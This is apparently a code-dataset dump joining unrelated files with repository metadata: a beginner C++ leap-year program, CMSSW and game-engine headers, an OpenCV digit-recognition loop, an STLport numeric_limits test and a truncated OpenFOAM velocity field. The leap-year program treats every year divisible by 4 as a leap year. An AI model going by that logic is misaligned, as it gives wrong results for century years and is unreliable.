FunctionGroupImport::overloads_end() const
{
return mOverloads.end();
}
}}
|
7f4a0d9e6ec3b050bd97932766020eb49d6f4762
|
fb49cc52097f825bf2e40303e2d16cfb754d5220
|
/PRAC16.CPP
|
cade7a1bfca760a056b864a1b9718ac530ee97fc
|
[] |
no_license
|
Prashant1099/Cpp-Program
|
cbf5a6cc41dad45ff4fa64df22dbb75fbf456ecd
|
a790d68bfeb48dbc980c746cb1352e1803277ee5
|
refs/heads/master
| 2022-04-21T20:58:40.045972
| 2020-04-24T09:52:58
| 2020-04-24T09:52:58
| 258,469,659
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 551
|
cpp
|
PRAC16.CPP
|
/* A program which takes any year as i/p and prints input year is either Leap
year or not with switch case*/
#include<conio.h>
#include<stdio.h>
#include<iostream.h>
void main()
{
int y;
clrscr();
cout<<"\n Enter any Year = ";
cin>>y;
switch(y%4)
{
case 0:
cout<<"\n "<<y<<" is Leap Year";
break;
case 1:
cout<<"\n "<<y<<" is not a Leap Year";
break;
case 2:
cout<<"\n "<<y<<" is not a Leap Year";
break;
case 3:
cout<<"\n "<<y<<" is not a Leap Year";
break;
}
getch();
}
|
08d68fa4491eb4f48d78ff1f1e8cfe82e30ce16c
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/SimG4Core/PhysicsLists/interface/CMSEmStandardPhysicsTrackingManager.h
|
eb4247d6a010df5be6daeb3de35f71ba4c65e86d
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
C++
| false
| false
| 1,666
|
h
|
CMSEmStandardPhysicsTrackingManager.h
|
#ifndef SimG4Core_PhysicsLists_CMSEmStandardPhysicsTrackingManager_h
#define SimG4Core_PhysicsLists_CMSEmStandardPhysicsTrackingManager_h
#include "G4VTrackingManager.hh"
#include "globals.hh"
#include "G4MscStepLimitType.hh"
#include "FWCore/ParameterSet/interface/ParameterSet.h"
class G4eMultipleScattering;
class G4CoulombScattering;
class G4eIonisation;
class G4eBremsstrahlung;
class G4eplusAnnihilation;
class G4ElectronNuclearProcess;
class G4PositronNuclearProcess;
class G4GammaGeneralProcess;
class CMSEmStandardPhysicsTrackingManager : public G4VTrackingManager {
public:
CMSEmStandardPhysicsTrackingManager(const edm::ParameterSet &p);
~CMSEmStandardPhysicsTrackingManager() override;
void BuildPhysicsTable(const G4ParticleDefinition &) override;
void PreparePhysicsTable(const G4ParticleDefinition &) override;
void HandOverOneTrack(G4Track *aTrack) override;
private:
void TrackElectron(G4Track *aTrack);
void TrackPositron(G4Track *aTrack);
void TrackGamma(G4Track *aTrack);
G4double fRangeFactor;
G4double fGeomFactor;
G4double fSafetyFactor;
G4double fLambdaLimit;
G4MscStepLimitType fStepLimitType;
struct {
G4eMultipleScattering *msc;
G4eIonisation *ioni;
G4eBremsstrahlung *brems;
G4CoulombScattering *ss;
G4ElectronNuclearProcess *nuc;
} electron;
struct {
G4eMultipleScattering *msc;
G4eIonisation *ioni;
G4eBremsstrahlung *brems;
G4eplusAnnihilation *annihilation;
G4CoulombScattering *ss;
G4PositronNuclearProcess *nuc;
} positron;
G4GammaGeneralProcess *gammaProc;
static CMSEmStandardPhysicsTrackingManager *masterTrackingManager;
};
#endif
|
bd07dd6471aeb25147be3d961a77891a1a9c877a
|
bbb0143e92d774455972a85a6b780bfc2e2d7dfe
|
/src/Platformer/Components/gocPhysicsSimple.cpp
|
9665bab101f9a4524a7c6cc2bac011ca26a4f810
|
[] |
no_license
|
StarlitGhost/Time-Travel-Platformer
|
1ca9bafad265e2c3bb2962ee29692ad9b6df4075
|
9a61ecb4118ba79146b637d0b6fed1996a19e71a
|
refs/heads/master
| 2021-05-28T11:54:26.312009
| 2012-02-17T17:26:32
| 2012-02-17T17:26:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 1,045
|
cpp
|
gocPhysicsSimple.cpp
|
#include "gocPhysicsSimple.h"
#include "FlatWorld/ComponentSystem/GameObject.h"
#include "FlatWorld/Utilities/MathsUtilities.h"
FlatWorld::Vector2f Direction(float angle)
{
angle = MathsUtilities::degToRad(angle);
return FlatWorld::Vector2f(cos(angle), sin(angle));
}
void gocPhysicsSimple::ReceiveMessage(std::string msg, void* data, unsigned int length)
{
if (msg == "force")
_acceleration += (*(FlatWorld::Vector2f*)data);
}
void gocPhysicsSimple::Update(float dt)
{
_velocity += _acceleration * dt;
_angularVelocity += _angularAcceleration * dt;
_velocity *= (1.f - (_velocityDamping * dt));
_angularVelocity *= (1.f - (_angularDamping * dt));
FlatWorld::Transform xform = GetOwner()->GetTransform();
xform.Position += _velocity;
xform.Angle += _angularVelocity;
GetOwner()->SetTransform(xform);
_acceleration = FlatWorld::Vector2f(0.f, 0.f);
_angularAcceleration = 0.f;
}
gocPhysicsSimple::gocPhysicsSimple()
{
_velocityDamping = 1.f;
_angularAcceleration = 0.f;
_angularVelocity = 0.f;
_angularDamping = 1.f;
}
|
aeb6e41635779eb17670f14989d8dfcfd4e96bae
|
14766dbe14ffbf2df7a69783ca1718ae8e2c32b0
|
/cam/test.cpp
|
3232d6fd09175b90007cbfeb53822ca09654ae73
|
[] |
no_license
|
RobinchowUPC/DigitsRecognizeMechineLearning
|
611cc69981bfd420072d1c0caa496b04eb007b97
|
bd1ef20e9dc9bf93438de5462ce1be5fabe0610b
|
refs/heads/master
| 2021-01-22T05:50:42.918479
| 2017-02-12T09:31:06
| 2017-02-12T09:36:41
| 81,713,451
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 4,516
|
cpp
|
test.cpp
|
#include <opencv2/highgui/highgui.hpp>
#include <opencv2/imgproc/imgproc.hpp>
#include <opencv2/core/core.hpp>
#include <stdio.h>
#include <iostream>
#include <string>
#include <ml.h>
#include "train.h"
using namespace cv;
using namespace std;
Point2f vertex[4];
Rect rect;
struct RectInfo{
int value;
int cen_x;
int cen_y;
} rectinfo[255];
//RectInfo tempsort;
const int totaldigits = 11;
const int totalpassword = 5;
void SortRect(struct RectInfo t[],int n);
int main()
{
VideoCapture cap(0);
if(!cap.isOpened())
{
return -1;
}
Mat frame;
Mat gray_frame;
Mat gray_contours;
vector<vector<Point> > contours;
//vector<Mat> contours(100);
vector<vector<Point> >::iterator It;
vector<Vec4i> hierarchy;
int rect_num = 0;
char str_rectnum[3]="ok";
int rect_height;
int rect_width;
String s;
bool stop = false;
// complete the parameter of imwrite
vector<int> compression_params;
compression_params.push_back(CV_IMWRITE_PXM_BINARY);
compression_params.push_back(0);
//creat train matrix
trainData = cvCreateMat(train_samples*classes, size_h * size_w, CV_32FC1);
trainClasses = cvCreateMat(train_samples*classes, 1, CV_32FC1);
getData();
train();
while(!stop)
{
//show the number
cap>>frame; //capture the frame
rect_num = 0;
imshow("Oral Video", frame); //show the Oral frame
cvtColor(frame,gray_frame,CV_BGR2GRAY);//convert to gray image
threshold(gray_frame,gray_frame,110,255,CV_THRESH_BINARY_INV);//show the threshold frame
erode(gray_frame,gray_frame,Mat(1,1,CV_8U),Point(-1,-1),1);//erode image
dilate(gray_frame,gray_frame,Mat(2,2,CV_8U),Point(-1,-1),1);//dilate image
imshow("Threshold Video",gray_frame);
gray_frame.copyTo(gray_contours);
//adaptiveThreshold(gray_frame,gray_frame,255,0,1,5,10);
findContours(gray_contours, contours, hierarchy, CV_RETR_EXTERNAL, CV_CHAIN_APPROX_NONE);
Mat result(gray_frame.size(),CV_8U,Scalar(255));
drawContours(result,contours,-1,Scalar(0),2);
imshow("Contours Video",result);
for(It = contours.begin();It < contours.end(); ++It) //get the rects of numbers
{
rect = boundingRect(*It);
vertex[0] = rect.tl();//
vertex[1].x = (float)rect.tl().x, vertex[1].y = (float)rect.br().y;
vertex[2] = rect.br();
vertex[3].x = (float)rect.br().x, vertex[3].y = (float)rect.tl().y;
rect_width = rect.br().x - rect.tl().x;
rect_height = rect.br().y - rect.tl().y;
if( ((rect_height * rect_width) < 600) && ( 150 < (rect_height * rect_width))&& (rect_height < 35) &&(10 <rect_height) && (5 < rect_width)&& (rect_width < 30))//*******Threshold********
{
sprintf(str_rectnum,"%d",rect_num);
Mat ROI_image = gray_frame(rect); //Save ROI image
s=str_rectnum;
resize(ROI_image, ROI_image, Size(size_w, size_h), 0, 0, INTER_NEAREST);
imwrite("./ROI//"+s+".pbm",ROI_image,compression_params);
IplImage recog_wait(ROI_image);
//printf("Local:%d %d %d %d \t ",rect.tl().x,rect.tl().y,rect.br().x,rect.br().y);
// complete the info of rect
rectinfo[rect_num].cen_x = (rect.tl().x+rect.br().x)/2;
rectinfo[rect_num].cen_y = (rect.tl().y+rect.br().y)/2;
rectinfo[rect_num].value = classify(&recog_wait);
rect_num ++;
for(int j=0;j<4;j++) //Draw Rect
{
line(gray_frame,vertex[j],vertex[(j+1)%4],Scalar(255,255,255),1);
}
}
}
if(It == contours.end())
{
if(rect_num == totaldigits)
{
SortRect(rectinfo,rect_num);
for(int j = 0;j < rect_num;j++)
{
printf("%d local:%d %d \n",rectinfo[j].value,rectinfo[j].cen_x,rectinfo[j].cen_y);
}
}
printf("\n -----%d--------OVER------------------------\n",rect_num);
}
imshow("CRect Video",gray_frame);
//cout << "Contours: " << endl;
if(waitKey(30) >=0)
stop = true;
}
return 0;
}
//Tell the password and the hit area from those rects.
void SortRect(struct RectInfo t[],int n)
{
RectInfo tempsort;
for(int i=0;i<n;i++)
{
for(int j=0;j<n-i-1;j++)
{
if(t[j].cen_y > t[j+1].cen_y)
{
tempsort = t[j+1];
t[j+1] = t[j];
t[j] = tempsort;
}
}
}
for(int i=0;i < totalpassword;i++)
{
for(int j=0;j< totalpassword-1-i;j++)
{
if(t[j].cen_x > t[j+1].cen_x)
{
tempsort = t[j+1];
t[j+1] = t[j];
t[j] = tempsort;
}
}
}
}
|
8439024253f04b8d2e43c6beb8d1d04de89c79b3
|
b4a3355ec84d211c8f4f2f831e61e943e9ac8bba
|
/ZooidEngine/ZooidEngine/Resources/Mesh.h
|
1efd9c83bcef2816e2d47750125235e615cb42c3
|
[
"MIT"
] |
permissive
|
azon04/ZooidEngine
|
91d061ee6bf3d5da6bc6f6e4db8537ac5d667edd
|
d5fb00edd5d3097976c5d110d3a70820d5d1a46c
|
refs/heads/master
| 2021-06-07T08:01:45.359432
| 2018-05-28T18:40:10
| 2018-05-28T18:40:10
| 82,997,896
| 4
| 1
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 505
|
h
|
Mesh.h
|
#ifndef __ZE_MESH_H__
#define __ZE_MESH_H__
#include "GameObjectModel/Object.h"
#include "Memory/Handle.h"
namespace ZE
{
class IGPUBufferArray;
class IGPUBufferData;
class GameContext;
class Material;
class Mesh : public Object
{
DEFINE_CLASS(Mesh)
public:
Mesh() :
m_doubleSided(false)
{}
IGPUBufferData* m_vertexBuffer;;
IGPUBufferData* m_indexBuffer;
IGPUBufferArray* m_bufferArray;
Material* m_material;
Handle m_hPhysicsBodySetup;
bool m_doubleSided;
};
}
#endif
|
ed6272c8e1b834d3901539948622560cccde5526
|
b5feb6b786a98937331214d1a6d3832e3c625b6d
|
/pathtracer/src/tools/Tools.hh
|
01cb10e9b7b4a853ad8f84b1bfb37f85c079ef11
|
[
"MIT"
] |
permissive
|
bjorn-grape/bidirectional-pathtracer
|
e62f23a0d2b665c00c203386d012e62c9511f6bb
|
6fbbf5fc6cee39f595533494d779726658d646e1
|
refs/heads/master
| 2020-04-23T21:56:38.105844
| 2019-07-25T16:40:55
| 2019-07-25T16:40:55
| 171,485,298
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 1,148
|
hh
|
Tools.hh
|
#pragma once
#include "SplitAxis.hh"
#include "Vector3D.hh"
#include "Polygon.hh"
#include "Ray.hh"
template<typename T>
class Tools {
public:
typedef std::function<bool(Vector3D<T>, Vector3D<T>)> funcVecTor3sqToBool;
typedef std::unordered_map<Polygon::compFactor, funcVecTor3sqToBool> mapAxis;
inline static SplitAxis::Axis minIndexOfThree(const T &x, const T &y, const T &z);
inline static SplitAxis::Axis maxIndexOfThree(const T &x, const T &y, const T &z);
// static Vector3D<float> origin_vector_;
static bool funCompareXlt(Vector3D<T> a, Vector3D<T> b) { return a.getX() < b.getX(); }
static bool funCompareYlt(Vector3D<T> a, Vector3D<T> b) { return a.getY() < b.getY(); }
static bool funCompareZlt(Vector3D<T> a, Vector3D<T> b) { return a.getZ() < b.getZ(); }
inline static mapAxis create_map() {
mapAxis m;
m[Polygon::X] = funCompareXlt;
m[Polygon::Y] = funCompareYlt;
m[Polygon::Z] = funCompareZlt;
// m[Polygon::distanceToOrigin] = funCompareDistanceOrigin;
return m;
}
static mapAxis comparisonFunctionsMap;
};
#include "Tools.hxx"
|
5d44e192909e089be7ed5f2bf97e59cfd1c729d2
|
bcf82a607c757ba0ead2997a760eabf1c2e491ee
|
/test/unit/limits_test.cpp
|
0d62affbaa209d0f11f250e5eda67d5e3796a4c7
|
[
"LicenseRef-scancode-stlport-4.5",
"LicenseRef-scancode-mit-old-style",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
LiveMirror/stlport
|
f338a945e2adbcb3d174258073a16a9053924b02
|
f30e7a8c331eb6ef154c0e1936c2bd0617811356
|
refs/heads/master
| 2021-09-05T14:48:59.167863
| 2012-12-29T18:45:45
| 2012-12-29T18:45:45
| 119,320,101
| 7
| 3
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 8,030
|
cpp
|
limits_test.cpp
|
/* boost limits_test.cpp test your <limits> file for important
*
* Copyright Jens Maurer 2000
* Permission to use, copy, modify, sell, and distribute this software
* is hereby granted without fee provided that the above copyright notice
* appears in all copies and that both that copyright notice and this
* permission notice appear in supporting documentation,
*
* Jens Maurer makes no representations about the suitability of this
* software for any purpose. It is provided "as is" without express or
* implied warranty.
*
*/
#include "limits_test.h"
#include <limits>
#include <ieee754.h>
using namespace std;
bool valid_sign_info(bool, bool)
{ return true; }
template <class _Tp>
bool valid_sign_info(bool limit_is_signed, const _Tp &) {
return (limit_is_signed && _Tp(-1) < 0) ||
(!limit_is_signed && _Tp(-1) > 0);
}
template <class _Tp>
bool test_integral_limits_base(const _Tp &, bool unknown_sign = true, bool is_signed = true) {
typedef numeric_limits<_Tp> lim;
EXAM_CHECK_ASYNC(lim::is_specialized);
EXAM_CHECK_ASYNC(lim::is_exact);
EXAM_CHECK_ASYNC(lim::is_integer);
EXAM_CHECK_ASYNC(!lim::is_iec559);
EXAM_CHECK_ASYNC(lim::min() < lim::max());
EXAM_CHECK_ASYNC((unknown_sign && ((lim::is_signed && (lim::min() != 0)) || (!lim::is_signed && (lim::min() == 0)))) ||
(!unknown_sign && ((lim::is_signed && is_signed) || (!lim::is_signed && !is_signed))));
if (unknown_sign) {
EXAM_CHECK_ASYNC(valid_sign_info(lim::is_signed, _Tp()));
}
return true;
}
template <class _Tp>
bool test_integral_limits(const _Tp &val, bool unknown_sign = true, bool is_signed = true) {
if (!test_integral_limits_base(val, unknown_sign, is_signed))
return false;
typedef numeric_limits<_Tp> lim;
EXAM_CHECK_ASYNC(lim::is_modulo);
if (lim::is_bounded ||
(!lim::is_bounded && !lim::is_signed)) {
_Tp tmp = lim::min();
EXAM_CHECK_ASYNC( --tmp > lim::min() );
}
if (lim::is_bounded) {
_Tp tmp = lim::max();
EXAM_CHECK_ASYNC( ++tmp < lim::max() );
}
return true;
}
template <class _Tp>
bool test_signed_integral_limits(const _Tp &__val) {
return test_integral_limits(__val, false, true);
}
template <class _Tp>
bool test_unsigned_integral_limits(const _Tp &__val) {
return test_integral_limits(__val, false, false);
}
template <class _Tp>
bool test_float_values(_Tp lhs, _Tp rhs)
{ return lhs == rhs; }
template <class _Tp>
int EXAM_IMPL(test_float_limits)
{
typedef numeric_limits<_Tp> lim;
EXAM_CHECK(lim::is_specialized);
EXAM_CHECK(!lim::is_modulo);
EXAM_CHECK(!lim::is_integer);
EXAM_CHECK(lim::is_signed);
EXAM_CHECK(lim::max() > 1000);
EXAM_CHECK(lim::min() > 0);
EXAM_CHECK(lim::min() < 0.001);
EXAM_CHECK(lim::epsilon() > 0);
if (lim::is_iec559) {
EXAM_CHECK(lim::has_infinity);
EXAM_CHECK(lim::has_quiet_NaN);
EXAM_CHECK(lim::has_signaling_NaN);
EXAM_CHECK(lim::has_denorm == denorm_present);
}
if (lim::has_denorm == denorm_absent) {
EXAM_CHECK(lim::denorm_min() == lim::min());
volatile _Tp tmp = lim::min();
tmp /= 2;
if (tmp > 0 && tmp < lim::min()) {
// has_denorm could be denorm_present
EXAM_MESSAGE("It looks like your compiler/platform supports denormalized floating point representation.");
}
} else if (lim::has_denorm == denorm_present) {
EXAM_CHECK(lim::denorm_min() > 0);
EXAM_CHECK(lim::denorm_min() < lim::min());
volatile _Tp tmp = lim::min();
while (tmp != 0) {
_Tp old_tmp = tmp;
tmp /= 2;
EXAM_CHECK(tmp < old_tmp);
EXAM_CHECK(tmp >= lim::denorm_min() || tmp == (_Tp)0);
//ostringstream str;
//str << "denorm_min = " << lim::denorm_min() << ", tmp = " << tmp;
//EXAM_MESSAGE(str.str().c_str());
}
}
if (lim::has_infinity) {
const volatile _Tp infinity = lim::infinity();
/* Make sure those values are not 0 or similar nonsense.
* Infinity must compare as if larger than the maximum representable value. */
volatile _Tp val = lim::max();
val *= 2;
EXAM_CHECK( val == infinity);
/*
ostringstream str;
str << "lim::max() = " << lim::max() << ", val = " << val << ", infinity = " << infinity;
EXAM_MESSAGE( str.str().c_str() );
str.str(string());
str << "sizeof(_Tp) = " << sizeof(_Tp);
EXAM_MESSAGE( str.str().c_str() );
if (sizeof(_Tp) == 4) {
str.str(string());
str << "val in hexa: " << showbase << hex << *((const unsigned int*)&val);
str << ", infinity in hexa: " << showbase << hex << *((const unsigned int*)&infinity);
}
#if defined (_STLP_LONG_LONG)
else if (sizeof(_Tp) == sizeof(_STLP_LONG_LONG)) {
str.str(string());
str << "val in hexa: " << showbase << hex << *((const unsigned _STLP_LONG_LONG*)&val);
str << ", infinity in hexa: " << showbase << hex << *((const unsigned _STLP_LONG_LONG*)&infinity);
}
#endif
else {
str.str(string());
str << "val: ";
for (int i = 0; i != sizeof(_Tp) / sizeof(unsigned short); ++i) {
if (i != 0) str << ' ';
str << showbase << hex << setw(4) << setfill('0') << *((const unsigned short*)&val + i);
}
str << ", infinity: ";
for (int i = 0; i != sizeof(_Tp) / sizeof(unsigned short); ++i) {
if (i != 0) str << ' ';
str << showbase << hex << setw(4) << setfill('0') << *((const unsigned short*)&infinity + i);
}
}
EXAM_MESSAGE( str.str().c_str() );
str.str(string());
str << dec;
str << "lim::digits = " << lim::digits << ", lim::digits10 = " << lim::digits10 << endl;
str << "lim::min_exponent = " << lim::min_exponent << ", lim::min_exponent10 = " << lim::min_exponent10 << endl;
str << "lim::max_exponent = " << lim::max_exponent << ", lim::max_exponent10 = " << lim::max_exponent10 << endl;
EXAM_MESSAGE( str.str().c_str() );
*/
EXAM_CHECK(infinity == infinity);
EXAM_CHECK(infinity > lim::max());
EXAM_CHECK(-infinity < -lim::max());
}
return EXAM_RESULT;
}
class ArbitraryType
{};
int EXAM_IMPL(limits_test::limits)
{
#if defined (__BORLANDC__)
/* Ignore FPU exceptions, set FPU precision to 64 bits */
unsigned int _float_control_word = _control87(0, 0);
_control87(PC_64|MCW_EM|IC_AFFINE, MCW_PC|MCW_EM|MCW_IC);
#endif
EXAM_CHECK(test_integral_limits_base(bool()));
EXAM_CHECK(test_integral_limits(char()));
typedef signed char signed_char;
EXAM_CHECK(test_signed_integral_limits(signed_char()));
typedef unsigned char unsigned_char;
EXAM_CHECK(test_unsigned_integral_limits(unsigned_char()));
#if defined (_STLP_HAS_WCHAR_T) && !defined (_STLP_WCHAR_T_IS_USHORT)
EXAM_CHECK(test_integral_limits(wchar_t()));
#endif
EXAM_CHECK(test_signed_integral_limits(short()));
typedef unsigned short unsigned_short;
EXAM_CHECK(test_unsigned_integral_limits(unsigned_short()));
EXAM_CHECK(test_signed_integral_limits(int()));
typedef unsigned int unsigned_int;
EXAM_CHECK(test_unsigned_integral_limits(unsigned_int()));
EXAM_CHECK(test_signed_integral_limits(long()));
typedef unsigned long unsigned_long;
EXAM_CHECK(test_unsigned_integral_limits(unsigned_long()));
#if defined (_STLP_LONG_LONG)
typedef _STLP_LONG_LONG long_long;
EXAM_CHECK(test_signed_integral_limits(long_long()));
typedef unsigned _STLP_LONG_LONG unsigned_long_long;
EXAM_CHECK(test_unsigned_integral_limits(unsigned_long_long()));
#endif
EXAM_CHECK( !numeric_limits<ArbitraryType>::is_specialized );
#if defined (__BORLANDC__)
/* Reset floating point control word */
_clear87();
_control87(_float_control_word, MCW_PC|MCW_EM|MCW_IC);
#endif
return EXAM_RESULT;
}
int EXAM_IMPL(limits_test::l_float)
{
return test_float_limits<float>( __exam_ts, 0 );
}
int EXAM_IMPL(limits_test::l_double)
{
return test_float_limits<double>( __exam_ts, 0 );
}
int EXAM_IMPL(limits_test::l_long_double)
{
#if !defined ( _STLP_NO_LONG_DOUBLE )
return test_float_limits<long double>( __exam_ts, 0 );
#else
throw exam::skip_exception();
#endif
}
|
d2db57935150d8f1f166c4e2b6121b49aca91c69
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/FWCore/Utilities/interface/Span.h
|
9d4f16b2b17e8fceb38e4f6e299333e6cd69d240
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
C++
| false
| false
| 935
|
h
|
Span.h
|
#ifndef FWCore_Utilities_Span_h
#define FWCore_Utilities_Span_h
#include <cstddef>
namespace edm {
/*
*An edm::Span wraps begin() and end() iterators to a contiguous sequence
of objects with the first element of the sequence at position zero,
In other words the iterators should refer to random-access containers.
To be replaced with std::Span in C++20.
*/
template <class T>
class Span {
public:
Span(T begin, T end) : begin_(begin), end_(end) {}
T begin() const { return begin_; }
T end() const { return end_; }
bool empty() const { return begin_ == end_; }
auto size() const { return end_ - begin_; }
auto const& operator[](std::size_t idx) const { return *(begin_ + idx); }
auto const& front() const { return *begin_; }
auto const& back() const { return *(end_ - 1); }
private:
const T begin_;
const T end_;
};
}; // namespace edm
#endif
|
41f179846adbac2b72e210df11c4ab357086c5ce
|
9f520bcbde8a70e14d5870fd9a88c0989a8fcd61
|
/pitzDaily/618/U
|
85b015e3eb26a592dda04f726e5bc797a195df4b
|
[] |
no_license
|
asAmrita/adjoinShapOptimization
|
6d47c89fb14d090941da706bd7c39004f515cfea
|
079cbec87529be37f81cca3ea8b28c50b9ceb8c5
|
refs/heads/master
| 2020-08-06T21:32:45.429939
| 2019-10-06T09:58:20
| 2019-10-06T09:58:20
| 213,144,901
| 1
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 251,583
|
U
|
/*--------------------------------*- C++ -*----------------------------------*\
| ========= | |
| \\ / F ield | OpenFOAM: The Open Source CFD Toolbox |
| \\ / O peration | Version: v1806 |
| \\ / A nd | Web: www.OpenFOAM.com |
| \\/ M anipulation | |
\*---------------------------------------------------------------------------*/
FoamFile
{
version 2.0;
format ascii;
class volVectorField;
location "618";
object U;
}
// * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * //
dimensions [0 1 -1 0 0 0 0];
internalField nonuniform List<vector>
6400
(
(-0.000108211925026 -0.000142060373711 0)
(-0.000288043736268 -0.000104493789277 0)
(-0.000418147985176 -8.19724560012e-05 0)
(-0.000557261894016 -7.07363819068e-05 0)
(-0.000658798269122 -4.45524028546e-05 0)
(-0.000732301957093 -2.47716746664e-05 0)
(-0.000772942559878 -1.72758263579e-05 0)
(-0.000806374525733 -2.69957386331e-05 0)
(-0.000891719095524 -3.79879475771e-05 0)
(-0.000975598213544 -3.55660591325e-05 0)
(-0.00101419047766 -3.17464680434e-05 0)
(-0.00108962267155 -3.32088559796e-05 0)
(-0.00115720618237 -2.95241799798e-05 0)
(-0.00121137046535 -2.36064157591e-05 0)
(-0.00125148360986 -2.09226705181e-05 0)
(-0.00129305910473 -2.35120478989e-05 0)
(-0.00134399826157 -2.41034766783e-05 0)
(-0.00138762131513 -2.06523235918e-05 0)
(-0.00141965293691 -1.59734808785e-05 0)
(-0.00144971263152 -1.39421651803e-05 0)
(-0.00148846326819 -1.87727607245e-05 0)
(-0.00153550694783 -2.38817566614e-05 0)
(-0.00158455850059 -2.45777083803e-05 0)
(-0.00162850899304 -2.33536158175e-05 0)
(-0.00166922548913 -2.10742648713e-05 0)
(-0.00170781408287 -1.84932682754e-05 0)
(-0.00174565716425 -1.71657830885e-05 0)
(-0.00177987998027 -1.54593362994e-05 0)
(-0.00180847158781 -1.31820715067e-05 0)
(-0.00183212972394 -1.13959278354e-05 0)
(-0.00185130304361 -1.08737356453e-05 0)
(-0.00187098709241 -9.89794385433e-06 0)
(-0.00189073051274 -8.13688557004e-06 0)
(-0.00190689928302 -7.94308075116e-06 0)
(-0.00192199925864 -7.74312655307e-06 0)
(-0.00194158693852 -7.36147002204e-06 0)
(-0.00195773143153 -7.60771603797e-06 0)
(-0.00196308776779 -6.76539315817e-06 0)
(-0.00197670906787 -4.95288287538e-06 0)
(-0.00199492856103 -3.83774388028e-06 0)
(-0.00200491309136 -5.24809921279e-06 0)
(-0.00200493600764 -4.52581151021e-06 0)
(-0.0020024117849 7.02209027233e-07 0)
(-0.00199807063855 4.48207172414e-06 0)
(-0.0019889544897 6.35246944172e-06 0)
(-0.00197577892709 8.4690690175e-06 0)
(-0.00195805460639 1.07602506988e-05 0)
(-0.00193472429631 1.36390207517e-05 0)
(-0.00190580141295 1.6465430385e-05 0)
(-0.00187112697048 1.72098324072e-05 0)
(-0.00183367130515 1.58424225345e-05 0)
(-0.00179947730662 1.82793924478e-05 0)
(-0.00175374651467 2.82914436207e-05 0)
(-0.00169985960882 3.47065446278e-05 0)
(-0.00162804485411 4.04535851566e-05 0)
(-0.00152822831742 4.91886222258e-05 0)
(-0.00142269485617 5.00644694172e-05 0)
(-0.00133039732089 4.94204996676e-05 0)
(-0.00123498719533 5.7507832958e-05 0)
(-0.00109844721408 6.46307661377e-05 0)
(-0.000960248111064 6.6758105329e-05 0)
(-0.000804341862212 8.49629182868e-05 0)
(-0.000661650035614 0.00012747310398 0)
(-0.000360612142681 0.000124879069892 0)
(-0.000123879325568 7.98748852064e-05 0)
(-4.54400018625e-06 5.44111206008e-05 0)
(7.93280332533e-05 4.28346112204e-05 0)
(0.000153232016492 3.60578383456e-05 0)
(0.000223653850244 3.09474365954e-05 0)
(0.000281271909652 2.40020387765e-05 0)
(0.000324133512528 1.50355437119e-05 0)
(0.000339312299744 4.39834592e-06 0)
(0.000329890989508 -6.81893468936e-06 0)
(0.000321242462475 -1.88635276194e-05 0)
(0.000257864692768 -2.06968917273e-05 0)
(0.00023635367547 -2.19767788704e-05 0)
(0.000161163083722 -1.4938664303e-05 0)
(0.000170265633392 -2.31599675437e-05 0)
(7.42007912423e-05 -1.74454068647e-05 0)
(5.55536637576e-05 -3.31870624608e-05 0)
(-4.11713037763e-05 -0.000201147110741 0)
(-0.00017443375976 -0.00022277197234 0)
(-0.000302896823391 -0.000198439438472 0)
(-0.000386566324546 -0.000158771894374 0)
(-0.000553102800755 -0.000153770555919 0)
(-0.000699450933275 -0.000108348282495 0)
(-0.000784541077331 -6.98807539755e-05 0)
(-0.000843624030798 -8.73714758666e-05 0)
(-0.000906362203435 -0.000110108906968 0)
(-0.000975805156821 -0.000106922777682 0)
(-0.00104119412342 -9.88889653247e-05 0)
(-0.00110091427276 -9.47250470545e-05 0)
(-0.00115621804391 -8.36378725371e-05 0)
(-0.00120544778745 -7.02558959533e-05 0)
(-0.00125304140995 -6.41556310165e-05 0)
(-0.0012983781995 -7.42566163782e-05 0)
(-0.00134445122035 -7.74598896173e-05 0)
(-0.0013824396728 -5.67017850726e-05 0)
(-0.00138750043408 -4.13623340202e-05 0)
(-0.00142514166316 -4.27432262881e-05 0)
(-0.00147506898049 -5.86004532636e-05 0)
(-0.00152857862023 -7.63709799234e-05 0)
(-0.00158587032059 -7.78046165486e-05 0)
(-0.00163367992248 -6.84667080755e-05 0)
(-0.00166425711857 -6.1246666959e-05 0)
(-0.00170791830983 -5.7210983687e-05 0)
(-0.00174807076073 -5.21086530821e-05 0)
(-0.00178005598978 -4.56754799217e-05 0)
(-0.00180755153079 -3.94458118268e-05 0)
(-0.00183214895378 -3.44941815402e-05 0)
(-0.00185313648165 -3.18347203201e-05 0)
(-0.00186695625989 -2.84916607491e-05 0)
(-0.00188651592352 -2.30707122639e-05 0)
(-0.00190161137981 -2.33453188867e-05 0)
(-0.00191423474237 -2.51292990432e-05 0)
(-0.00194059363675 -2.21409933089e-05 0)
(-0.00195316558744 -2.20031941499e-05 0)
(-0.0019587898314 -2.23393299037e-05 0)
(-0.00197698760814 -1.87205290845e-05 0)
(-0.00200352646828 -1.28026261443e-05 0)
(-0.00201508477685 -4.43924325785e-06 0)
(-0.001977090534 3.21919912595e-06 0)
(-0.00195554592271 7.82581802636e-06 0)
(-0.00195576836881 1.11617114124e-05 0)
